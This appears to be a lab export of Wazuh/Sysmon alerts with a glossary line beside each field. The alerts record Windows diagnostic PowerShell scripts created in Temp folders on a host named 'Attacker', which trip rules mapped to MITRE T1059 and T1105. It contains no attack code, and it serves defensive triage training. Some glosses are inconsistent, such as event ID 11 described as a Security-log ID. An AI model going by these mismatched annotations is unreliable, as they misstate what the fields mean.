manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.542974 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Event ID from the source channel; on the Sysmon channel, 11 is FileCreate (the classic Security-log IDs are 4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1541658Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215902 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.152
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_SyncSystemTime.ps1
CreationUtcTime: 2025-04-17 16:47:59.152
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_SyncSystemTime.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.545637 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Event ID from the source channel; on the Sysmon channel, 11 is FileCreate (the classic Security-log IDs are 4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1641125Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215905 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.162
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_UserDiagnosticHistory.ps1
CreationUtcTime: 2025-04-17 16:47:59.162
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.162 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_UserDiagnosticHistory.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.162 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.548328 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Event ID from the source channel; on the Sysmon channel, 11 is FileCreate (the classic Security-log IDs are 4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1720606Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215906 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.164
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_UserWERQueue.ps1
CreationUtcTime: 2025-04-17 16:47:59.164
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.164 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_UserWERQueue.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.164 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.550983 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Event ID from the source channel; on the Sysmon channel, 11 is FileCreate (the classic Security-log IDs are 4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1781228Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215907 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.173
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_DiagnosticHistory.ps1
CreationUtcTime: 2025-04-17 16:47:59.170
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.173 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_DiagnosticHistory.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.170 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.553658 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Event ID from the source channel; on the Sysmon channel, 11 is FileCreate (the classic Security-log IDs are 4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1906537Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215909 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.181
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_InaccurateSystemTime.ps1
CreationUtcTime: 2025-04-17 16:47:59.181
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.181 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_InaccurateSystemTime.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.181 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.556345 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Event ID from the source channel; on the Sysmon channel, 11 is FileCreate (the classic Security-log IDs are 4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.2078912Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215910 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.190
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_WERQueue.ps1
CreationUtcTime: 2025-04-17 16:47:59.190
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.190 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_WERQueue.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.190 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.558984 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:48:00.6014475Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215966 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:48:00.599
ProcessGuid: {94294ddc-30bf-6801-4608-000000000e00}
ProcessId: 6980
Image: C:\WINDOWS\System32\sdiagnhost.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_db30s5jz.dk2.ps1
CreationUtcTime: 2025-04-17 16:48:00.599
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:48:00.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-30bf-6801-4608-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6980 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\sdiagnhost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_db30s5jz.dk2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:48:00.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.id: 11 Numeric ID of the detection rule that fired.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['stats'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533991.561646 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: The average number of logs between 22:00 and 23:00 is 2213. We reached 5534. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
